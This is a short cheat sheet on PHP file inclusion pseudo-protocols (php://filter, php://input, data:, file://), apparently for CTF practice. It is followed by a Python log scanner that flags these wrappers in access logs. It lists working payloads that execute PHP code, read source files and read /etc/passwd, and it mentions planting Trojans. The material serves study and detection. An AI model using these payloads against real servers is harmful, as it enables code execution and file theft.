Pseudo-protocols that can be used in file inclusion vulnerabilities
0x01 File inclusion functions
PHP functions that can lead to file inclusion vulnerabilities: include, require, include_once, require_once, highlight_file, show_source, readfile, file_get_contents, fopen, file
Reading files and executing code through the php and data pseudo-protocols:
1. ?file=data:text/plain,<?php phpinfo()?> # GET data
2. ?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4= # the characters after "base64," must be the base64 encoding of the string being passed
3. ?file=php://input [POST DATA:] <?php phpinfo()?> # POST data
4. ?file=php://filter/read=convert.base64-encode/resource=xxx.php # GET, reads source code
0x02 php pseudo-protocol
Require allow_url_fopen to be enabled: php://input, php://stdin, php://memory and php://temp
Does not require allow_url_fopen to be enabled: php://filter
The ones most often used in CTFs are php://filter and php://input
php://filter is used to read source code, php://input is used to execute PHP code
php://input requires the data to be submitted in a POST request
php://filter can be submitted with GET: ?a=php://filter/read=convert.base64-encode/resource=xxx.php
0x03 data pseudo-protocol
Common in CTFs:
?xxx=data://text/plain;base64,[base64 encoding of the value you want file_get_contents() to return]
?file=data:text/plain,<?php phpinfo()?>
0x04 file:// protocol
file:// accesses the local file system
file:// is used to access the local file system, for example things on the C: drive. In CTFs it is generally used to read local files, and it is unaffected by allow_url_fopen and allow_url_include.
file://[absolute path and file name of the file]
Linux environment: ?file=file:///etc/passwd
Windows environment: ?file=file:///E:\phpStudy\WWW\code\phpinfo.php
Pseudo-protocol summary
The file:// protocol is used to read files, such as key content on the C: drive. php://filter is used to read the contents of a file, but the output has to be base64-encoded; otherwise the file is executed and only the result of the execution is visible. php://input (code execution) allows the data of a POST request to be executed as PHP code. It can be used to write Trojans. data is similar to input and allows code execution, but a Trojan can only be written when php < 5.3 and include = on.
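On the defensive side, the request strings listed above stand out in web server access logs. The following is an added example, not part of the original page: it scans access-log lines for query parameters whose value begins with one of the wrappers covered here, decoding repeated URL encoding first. The log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Wrappers covered on this page; data appears both as data: and data://.
# Matched only at the start of the value: a wrapper takes effect only when
# it begins the path string handed to include()/file_get_contents().
WRAPPER_RE = re.compile(
    r"\s*(php://(?:filter|input|stdin|memory|temp)|data:|file://)", re.I)
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?file=about.php HTTP/1.1" 200 512
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?file=php://filter/read=convert.base64-encode/resource=xxx.php HTTP/1.1" 200 2048
203.0.113.9 - - [10/Oct/2023:13:56:07 +0000] "POST /index.php?file=PHP%3A%2F%2Finput HTTP/1.1" 200 90
203.0.113.9 - - [10/Oct/2023:13:56:12 +0000] "GET /index.php?file=data%253Atext%252Fplain%253Bbase64%252CPD9waHAgcGhwaW5mbygpPz4%253D HTTP/1.1" 200 90
203.0.113.9 - - [10/Oct/2023:13:56:20 +0000] "GET /index.php?file=file:///etc/passwd HTTP/1.1" 200 1301
203.0.113.7 - - [10/Oct/2023:13:57:02 +0000] "GET /search.php?q=notes+on+php://filter HTTP/1.1" 200 733
"""

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %253A -> %3A -> :), bounded."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_wrapper_params(log_text):
    """Return (line number, parameter name, wrapper) for each suspicious value."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        request = REQUEST_RE.search(line)
        if not request:
            continue
        _, _, query = request.group("target").partition("?")
        # parse_qsl splits on the first '=' only and decodes once.
        for name, value in parse_qsl(query, keep_blank_values=True):
            wrapper = WRAPPER_RE.match(fully_decode(value))
            if wrapper:
                hits.append((lineno, name, wrapper.group(1).lower()))
    return hits

if __name__ == "__main__":
    for hit in find_wrapper_params(SAMPLE_LOG):
        print(hit)
```

For php://input the PHP code travels in the POST body, which access logs normally do not record, so only the wrapper name in the query string is visible to this check.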
Reference links: https://blog.csdn.net/weixin_43272781/article/details/94645507
https://www.cnblogs.com/Oran9e/p/7795057.html